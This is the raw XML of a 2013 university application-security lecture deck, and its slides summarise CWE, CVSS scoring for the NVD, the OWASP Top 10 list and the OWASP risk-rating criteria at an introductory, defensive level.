            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> corporation spinoff of CVE list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Similar to OWASP top 10, but much more specific.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each CVE has a cause that is a CWE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ex: CWE-306 “Missing Authentication for Critical Function” is A02 “Broken Authentication and Session Management” but much more specific.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.criticalwatch.com/assets/c-Owasp-to-Wasc-to-CWE-Mapping-Tech-Paper-0710131.pdf</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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3733800"/>
            <a:ext cx="3581400" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71433"/>
              <a:gd name="adj2" fmla="val 60881"/>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WASC is the Web Application Security Consortium, another list.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2034336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Common Vulnerability Scoring System (CVSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NIST-run scoring for the National Vulnerability Database (NVD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another attempt to score vulnerabilities quantitatively and qualitatively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only benefit is that it’s a de-facto standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://nvd.nist.gov/cvss.cfm?calculator</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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25794450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Common Vulnerability Scoring System (CVSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NIST-run scoring for the National Vulnerability Database (NVD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another attempt to score vulnerabilities quantitatively and qualitatively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only benefit is that it’s a de-facto standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://nvd.nist.gov/cvss.cfm?calculator</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58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2362200"/>
            <a:ext cx="4267200" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52160"/>
              <a:gd name="adj2" fmla="val -79725"/>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Scores based on local/remote, complexity, authentication, confidentiality, integrity, availability, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6726823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Classifying/Prioritizing Threats</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerability Scoring System (CVSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NIST-run scoring for the National Vulnerability Database (NVD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Another attempt to score vulnerabilities quantitatively and qualitatively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only benefit is that it’s a de-facto standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://nvd.nist.gov/cvss.cfm?calculator</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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2362200"/>
            <a:ext cx="4267200" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 52160"/>
              <a:gd name="adj2" fmla="val -79725"/>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Scores based on local/remote, complexity, authentication, confidentiality, integrity, availability, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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533400"/>
            <a:ext cx="5110163" cy="520585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ounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5350164" y="5220874"/>
            <a:ext cx="2895600" cy="623441"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49913"/>
              <a:gd name="adj2" fmla="val -88960"/>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Web-app for scoring.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1097248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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broken authentication and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>misconfiguraiton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive data exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Missing function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using components with known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards</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6</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15012960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deadlines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81729952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&amp; answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Comments?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Concerns?</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3049145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Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Broken authentication and session management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>misconfiguraiton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sensitive data exposure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Missing function level access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using components with known vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> redirects and forwards</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="2590800"/>
            <a:ext cx="4267200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25796"/>
              <a:gd name="adj2" fmla="val -131398"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha val="6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sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is a different list than in the book. E.g. XSS dropped from 2 to 3 and #9 appeared.  Book is based on 2010 version.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>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23094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OWASP Risk Rating approach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</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2176704"/>
            <a:ext cx="7858125" cy="27477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3400" y="5105400"/>
            <a:ext cx="6582058" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.owasp.org/images/8/8b/Top_10_2013-appsec-risks.png</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4063068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OWASP Top 10 (in 2013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a: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OWASP Risk Rating approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All weaknesses rated according to four criteria</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack vectors: easy, average, difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevalence: widespread, common uncommon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detectability: easy, average, difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Impacts: severe, moderate, minor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rankings in each determine the position in the top 10 list.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{16D7F6B3-FE9A-4A71-A476-BA18060D4072}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="6324600"/>
            <a:ext cx="5728684" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>: https://www.owasp.org/index.php/Top_10_2013-Top_10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2046376525"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Todd's Franklin Template">
  <a:themeElements>
    <a:clrScheme name="Franklin University">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="133C5D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="4F7492"/>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Todd's Franklin Template</Template>
  <TotalTime>962</TotalTime>
  <Words>4957</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>641</Paragraphs>
  <Slides>61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Todd's Franklin Template</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>ISEC 400 Application Security Week 4</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Outcomes</vt:lpstr>
      <vt:lpstr>Lists of Very Bad Things</vt:lpstr>
      <vt:lpstr>Lists of Very Bad Things</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OWASP Top 10 (in 2013*)</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>Attack Surface Reduction</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Classifying/Prioritizing Threats</vt:lpstr>
      <vt:lpstr>Upcoming deadlines</vt:lpstr>
      <vt:lpstr>Question &amp; answer</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Franklin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the Course</dc:title>
  <dc:creator>Todd Whittaker</dc:creator>
  <cp:lastModifiedBy>Todd Whittaker</cp:lastModifiedBy>
  <cp:revision>53</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-23T19:29:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-09T13:29:15Z</dcterms:modified>
</cp:coreProperties>
</file>